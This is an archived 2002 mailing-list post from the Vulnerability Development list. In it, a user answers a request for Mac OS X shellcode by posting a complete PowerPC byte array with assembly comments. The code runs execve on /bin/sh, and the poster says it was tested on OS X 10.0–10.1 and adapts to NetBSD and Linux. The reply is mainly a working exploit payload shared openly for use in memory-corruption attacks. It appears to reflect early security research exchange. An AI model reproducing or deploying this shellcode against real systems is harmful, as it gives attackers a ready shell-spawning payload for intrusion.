Vulnerability Development mailing list archives
Re: OS X Shell Code
From: ghandi <ghandi () dopesquad net>
Date: Thu, 10 Jan 2002 17:42:31 -0700 (MST)
Here is some shellcode that I wrote a while back. It was written and tested on a G3 running OSX 10.0.x - 10.1.x. IIRC it worked fine on NetBSD also (same syscall number for execve) and fine on Linux with a changed system call number. The assembly language source and header files are available at http://www.dopesquad.net/security. /* PPC MacOS X (maybe others) shellcode * * ghandi <ghandi () mindless com> */ char shellcode[] = "\x7c\xa5\x2a\x79" /* xor. r5, r5, r5 ; r5 = NULL */ "\x40\xa2\xff\xfd" /* bnel shellcode */ "\x7f\xe8\x02\xa6" /* mflr r31 */ "\x3b\xff\x01\x30" /* addi r31, r31, 268+36 */ "\x38\x7f\xfe\xf4" /* addi r3, r31, -268 ; r3 = path */ "\x90\x61\xff\xf8" /* stw r3, -8(r1) ; argv[0] = path */ "\x90\xa1\xff\xfc" /* stw r5, -4(r1) ; argv[1] = NULL */ "\x38\x81\xff\xf8" /* subi r4, r1, 8 ; r4 = {path, 0} */ "\x3b\xc0\x76\x01" /* li r30, 30209 */ "\x7f\xc0\x4e\x70" /* srawi r0, r30, 9 */ "\x44\xff\xff\x02" /* sc ; execve(r3, r4, r5) */ "/bin/sh" ; -- ghandi / ghandi () mindless com / www.dopesquad.net "Bein' Crazy is the least of my worries." - Jack Kerouac C439 2B06 D8D2 A2D8 1ABB 0A55 A61D 9057 63F5 9B1F On Thu, 10 Jan 2002, Josha Bronson wrote:
Greetins VulnDev, Anyone have some pointers (hah.. punny..) to shellcode examples for OS X? Thanks in advance, -- Josha Bronson dmuz () angrypacket com AngryPacket Security
Current thread:
- OS X Shell Code Josha Bronson (Jan 10)
- Re: OS X Shell Code ghandi (Jan 10)
- <Possible follow-ups>
- Re: OS X Shell Code fintler (Jan 10)
- Re: OS X Shell Code Josha Bronson (Jan 10)
- Re[2]: OS X Shell Code Meder Kydyraliev (Jan 10)
- Re: OS X Shell Code qobaiashi (Jan 11)
- Re: OS X Shell Code Josha Bronson (Jan 10)
- RE: OS X Shell Code Andersen, Thomas Bjoern (Jan 11)